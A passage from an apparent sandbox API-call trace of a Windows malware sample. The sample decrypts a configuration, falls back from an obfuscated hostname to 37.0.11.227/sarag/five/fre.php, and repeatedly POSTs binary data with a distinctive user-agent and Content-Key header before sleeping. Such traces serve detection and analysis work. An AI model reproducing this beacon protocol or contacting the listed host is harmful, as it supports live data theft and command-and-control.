GetProcessHeap () returned 0x690000 [0257.025] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0257.025] GetProcessHeap () returned 0x690000 [0257.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0257.026] closesocket (s=0x760) returned 0 [0257.027] GetProcessHeap () returned 0x690000 [0257.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0257.027] GetProcessHeap () returned 0x690000 [0257.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0257.029] GetProcessHeap () returned 0x690000 [0257.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0257.029] GetProcessHeap () returned 0x690000 [0257.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0257.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14fc) returned 0x760 [0257.031] Sleep (dwMilliseconds=0xea60) [0257.033] GetProcessHeap () returned 0x690000 [0257.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0257.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.034] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0257.053] GetProcessHeap () returned 0x690000 [0257.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0257.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.115] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0257.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.568] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.569] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.569] GetProcessHeap () returned 0x690000 [0257.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0257.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.743] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0257.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.786] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0257.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.788] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0257.789] GetProcessHeap () returned 0x690000 [0257.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0257.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0257.790] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0257.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0257.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0257.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0257.934] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0257.935] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0257.935] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0257.935] GetProcessHeap () returned 0x690000 [0257.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0257.953] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0257.955] GetProcessHeap () returned 0x690000 [0257.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0257.955] GetProcessHeap () returned 0x690000 [0257.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0257.956] GetProcessHeap () returned 0x690000 [0257.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0257.956] GetProcessHeap () returned 0x690000 [0257.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0257.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0257.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.985] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0257.993] GetProcessHeap () returned 0x690000 [0257.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0257.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.994] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0257.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.994] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0257.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.995] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0257.995] GetProcessHeap () returned 0x690000 [0257.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0257.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.997] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0257.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.998] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0257.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0257.999] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0257.999] GetProcessHeap () returned 0x690000 [0257.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0257.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.000] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0258.000] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.001] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0258.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.002] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0258.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.003] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0258.003] GetProcessHeap () returned 0x690000 [0258.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0258.003] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0258.003] GetProcessHeap () returned 0x690000 [0258.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0258.003] socket (af=2, type=1, protocol=6) returned 0x764 [0258.004] connect (s=0x764, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0258.031] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0258.031] GetProcessHeap () returned 0x690000 [0258.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0258.031] GetProcessHeap () returned 0x690000 [0258.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0258.031] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.032] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.032] GetProcessHeap () returned 0x690000 [0258.032] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0258.032] GetProcessHeap () returned 0x690000 [0258.033] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.033] GetProcessHeap () returned 0x690000 [0258.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0258.033] GetProcessHeap () returned 0x690000 [0258.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0258.034] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.035] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.035] GetProcessHeap () returned 0x690000 [0258.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0258.035] GetProcessHeap () returned 0x690000 [0258.035] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.035] send (s=0x764, buf=0x6ad508*, len=242, flags=0) returned 242 [0258.036] send (s=0x764, buf=0x6aba40*, len=159, flags=0) returned 159 [0258.036] GetProcessHeap () returned 0x690000 [0258.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0258.036] recv (in: s=0x764, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0258.104] GetProcessHeap () returned 0x690000 [0258.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0258.104] GetProcessHeap () returned 0x690000 [0258.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0258.105] GetProcessHeap () returned 0x690000 [0258.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0258.105] GetProcessHeap () returned 0x690000 [0258.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0258.106] closesocket (s=0x764) returned 0 [0258.106] GetProcessHeap () returned 0x690000 [0258.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0258.107] GetProcessHeap () returned 0x690000 [0258.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.108] GetProcessHeap () returned 0x690000 [0258.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0258.109] GetProcessHeap () returned 0x690000 [0258.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0258.110] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1500) returned 0x764 [0258.115] Sleep (dwMilliseconds=0xea60) [0258.117] GetProcessHeap () returned 0x690000 [0258.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0258.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.220] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0258.247] GetProcessHeap () returned 0x690000 [0258.248] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0258.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.249] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0258.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.252] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.252] GetProcessHeap () returned 0x690000 [0258.252] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0258.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.254] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0258.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.257] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0258.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.258] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0258.258] GetProcessHeap () returned 0x690000 [0258.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.259] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0258.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.260] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0258.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.262] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0258.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.263] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0258.263] GetProcessHeap () returned 0x690000 [0258.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0258.263] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0258.263] GetProcessHeap () returned 0x690000 [0258.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0258.264] GetProcessHeap () returned 0x690000 [0258.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.264] GetProcessHeap () returned 0x690000 [0258.265] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0258.265] GetProcessHeap () returned 0x690000 [0258.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0258.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.266] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0258.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0258.282] GetProcessHeap () returned 0x690000 [0258.282] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0258.283] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.284] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0258.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.285] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0258.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.286] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0258.286] GetProcessHeap () returned 0x690000 [0258.287] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0258.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.288] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0258.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.291] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0258.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0258.293] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0258.293] GetProcessHeap () returned 0x690000 [0258.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0258.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.294] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0258.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.295] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0258.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0258.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0258.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0258.297] GetProcessHeap () returned 0x690000 [0258.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0258.297] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0258.298] GetProcessHeap () returned 0x690000 [0258.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0258.298] socket (af=2, type=1, protocol=6) returned 0x768 [0258.298] connect (s=0x768, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0258.336] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0258.336] GetProcessHeap () returned 0x690000 [0258.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0258.336] GetProcessHeap () returned 0x690000 [0258.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0258.337] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.338] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0258.338] GetProcessHeap () returned 0x690000 [0258.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0258.338] GetProcessHeap () returned 0x690000 [0258.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.340] GetProcessHeap () returned 0x690000 [0258.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0258.340] GetProcessHeap () returned 0x690000 [0258.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0258.341] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0258.342] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0258.342] GetProcessHeap () returned 0x690000 [0258.342] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0258.342] GetProcessHeap () returned 0x690000 [0258.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0258.345] send (s=0x768, buf=0x6ad508*, len=242, flags=0) returned 242 [0258.346] send (s=0x768, buf=0x6aba40*, len=159, flags=0) returned 159 [0258.346] GetProcessHeap () returned 0x690000 [0258.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0258.346] recv (in: s=0x768, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0258.427] GetProcessHeap () returned 0x690000 [0258.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0258.440] GetProcessHeap () returned 0x690000 [0258.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0258.440] GetProcessHeap () returned 0x690000 [0258.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0258.441] GetProcessHeap () returned 0x690000 [0258.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0258.441] closesocket (s=0x768) returned 0 [0258.442] GetProcessHeap () returned 0x690000 [0258.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0258.443] GetProcessHeap () returned 0x690000 [0258.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0258.443] GetProcessHeap () returned 0x690000 [0258.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0258.444] GetProcessHeap () returned 0x690000 [0258.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0258.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1508) returned 0x768 [0258.446] Sleep (dwMilliseconds=0xea60) [0258.449] GetProcessHeap () returned 0x690000 [0258.449] RtlAllocateHeap (HeapHandle=0x690000, 